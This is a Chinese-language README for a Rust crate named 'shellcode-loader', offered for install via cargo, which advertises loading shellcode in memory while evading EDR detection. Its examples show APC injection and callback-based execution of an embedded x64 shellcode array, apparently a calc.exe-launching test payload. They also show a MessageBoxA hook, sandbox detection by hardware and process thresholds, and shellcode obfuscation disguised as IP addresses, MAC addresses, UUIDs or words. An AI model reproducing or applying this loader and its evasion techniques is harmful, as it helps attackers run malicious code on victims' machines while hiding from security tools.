shellcode-loader

一个在内存中加载二进制shellcode的rust crate

目录

• shellcode-loader
  • 一个在内存中加载二进制shellcode的rust crate
  • 目录
  • 功能特性
  • 安装使用
  • 加载方式：
    • 1.加载器
    • 2.hook系统函数
  • 对抗操作：
    • 1.沙箱检测：
    • 2.obf混淆：

功能特性

加载shellcode或其它代码，尝试绕过EDR检测，包含了多种加载方式以及对抗机制。

安装使用

通过cargo导入即可

cargo add shellcode-loader

加载方式：

1.加载器

输入bin文件、字节码，直接加载到内存执行

• APC注入：向挂起的线程的APC队列中添加任务来执行shellcode
• callback调用：调用合法的Windows函数，将它的回调函数改为我们自己的shellcode从而触发执行

示例：APC注入：

use shellcode-loader::loads::apc;
#[test]
pub fn test_1(){
    let buf: [u8; 276] = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,
        0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,
        0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,
        0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,
        0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,
        0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,
        0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,
        0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,
        0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
        0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
        0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,
        0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,
        0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,
        0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,
        0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,
        0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,
        0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,
        0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,
        0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,
        0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,
        0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
        0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,
        0x2e,0x65,0x78,0x65,0x00];
        let _=apc(&buf);
}

示例：callback调用：

use shellcode-loader::loads::callback;
#[test]
pub fn test_callback(){
    let buf: [u8; 276] = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,
        0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,
        0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,
        0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,
        0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,
        0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,
        0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,
        0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,
        0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
        0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
        0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,
        0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,
        0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,
        0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,
        0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,
        0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,
        0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,
        0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,
        0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,
        0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,
        0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
        0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,
        0x2e,0x65,0x78,0x65,0x00];
    let _=callback(&buf);
    }

2.hook系统函数

hook系统函数入口点，跳转到自定义函数执行

• hook messageBoxA：hook messageBoxA函数，在调用messageBoxA时跳转到自定义的函数执行

示例：hook messageBoxA：

use shellcode-loader::hook::hook_message_box_a_hook;
#[test]
    pub fn test_hook_message_box_a_hook(){
        fn hello(){
            //你自己定义的任意函数
            println!("hello hook!");
        }

        hook_message_box_a_hook(hello);
    }

对抗操作：

1.沙箱检测：

通过CPU数量、RAM大小、进程数量、磁盘大小来判断是否为沙箱

示例：沙箱检测：

use shellcode-loader::sandbox::is_sandbox;
#[test]
fn test_is_sandbox(){
    const MAX_CPU_COUNT:u32=4;
    const MAX_RAM_SIZE:u32=8;
    const MAX_PROCESS_COUNT:u32=100;
    const MAX_DISK_SIZE:u32=60;

    println!("isSandbox?{}!",shellcode_loader::sandbox::is_sandbox(MAX_CPU_COUNT, MAX_RAM_SIZE, MAX_PROCESS_COUNT, MAX_DISK_SIZE));
}

2.obf混淆：

读取bin文件并混淆，运行时动态解密

包含以下两个函数：

• obfuscate_file：混淆函数，传入bin文件路径、选择的混淆方式，支持以下混淆方式：
  • ipv4
  • ipv6
  • mac
  • uuid
  • words
• deobfuscate_file：解混淆函数，传入混淆后的Vec数组、选择的混淆方式。

示例：obf混淆、解混淆：

use crate::obf::{obfuscate_file,deobfuscate_data};
#[test]
pub fn test_obf(){
    // 1. 读取bin文件并混淆
    let obfuscated_data = obfuscate_file("./src/obf/test.bin", "words").unwrap();
        
    // 2. 解混淆得到字节数组
    let buf = deobfuscate_data(&obfuscated_data, "words").unwrap();
        
    // 3.可以调用其它的函数，传入返回的buf即可，Vec会自动解引用为buf数组无需手动替换
    apc(&buf);
}